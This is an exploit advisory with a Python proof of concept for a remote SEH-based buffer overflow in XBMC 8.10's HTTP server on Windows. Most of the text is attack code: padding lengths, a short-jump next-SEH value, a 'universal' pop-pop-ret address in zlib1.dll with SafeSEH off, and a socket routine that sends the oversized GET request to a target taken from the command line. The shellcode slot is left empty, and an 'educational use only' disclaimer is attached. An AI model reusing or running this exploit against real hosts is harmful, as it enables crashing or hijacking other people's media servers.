XBMC 8.10 GET request remote buffer overflow *SEH* (universal address)!!
Tested: Win XP SP2 Eng, Win Vista SP1
Release date: April the 4th 2009
Versions affected: Windows, all versions.
I had tried for a while to get a nice pop ebx pop ret address and just
could not find a suitable one, especially one that was any good, and it
had to be shipped with the application and not have /SafeSEH.
To start with I looked at zlib.dll to see if there were any
nice pop pop ret addresses; I noticed there was one in particular that
stood out and decided to try it.
There is no need for me to release any more exploits for this application,
as I have covered all the areas which I wanted to and want to
move on from this.
If you're interested to see how this worked, attach a debugger and add some
hit tracing :). It is possible to use this with all the buffer overflows.
Credits to n00b for finding the buffer overflow and writing
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
# Python 2 proof of concept, as shipped with the advisory (struct import and
# connect call were missing from the original listing and are restored here).
import sys, socket, struct
port = 80
host = sys.argv[1]          # target host is taken from the first command-line argument
Junk_buffer1 = 'A'*998      # padding up to the SEH record
# Next SEH pointer: short jump over the handler address (jmp +6; nop; nop)
Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Module Name=C:\Program Files\XBMC\zlib1.dll
###This was found in the module zlib1 and is universal.
#62E83BAC 5B POP EBX
#62E83BAD 5D POP EBP
#62E83BAE ^E9 CDD9FFFF JMP zlib1.compressBound
SE_Handler = struct.pack('<L',0x62E83BAC)
# Placeholder: the original advisory does not include the payload.
Shell_code = ''
Junk_buffer3 = 'D'*635      # trailing padding
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Junk_buffer1 + Pointer_To_Next_SEH + SE_Handler + Shell_code + Junk_buffer3)
# create an unbuffered file-like object to write the request through
fileobj = c.makefile('w', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
fileobj.close()
c.close()